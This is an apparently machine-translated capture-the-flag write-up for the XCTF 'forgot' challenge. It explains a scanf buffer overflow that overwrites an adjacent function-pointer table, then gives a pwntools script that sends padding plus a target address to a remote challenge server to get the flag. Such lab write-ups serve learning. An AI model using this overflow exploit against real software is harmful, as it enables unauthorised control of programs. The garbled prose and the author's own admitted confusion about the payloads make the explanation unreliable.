xctf - forgot
check it, open the NX
Ida pull in, you can find:
__isoc99_scanf, infinitely input,
Cycle, the reading of the character 32 and scanf determination, the presence of the last call function table according to a result on the stack, located just below the overflow variable,
And v3 + --v14 used directly as a function of stack address, if v14 is 1, the address would be a function of v3. So construction of padding plus 63 byte destination address can get filled flag
from pwn import * context.log_level = 'debug' p = remote('111.198.29.45',31543) #p = process('./forgot') ''' payload="A"*63+"\xcc\x86\x04\x08" p.recvuntil("What is your name?") p.sendline(payload) p.interactive() ''' payload = 'A'*0x24+p32(0x080486CC) #payload = "A"*32+"\xcc\x86\x04\x08" p.recvuntil("> ") p.sendline('a') p.recvuntil("> ") p.sendline(payload) p.interactive()
ps: 暂时不知道为什么payload = "A"*32+"\xcc\x86\x04\x08"可以得到flag,但是payload = "a"*32+"\xcc\x86\x04\x08"却不能。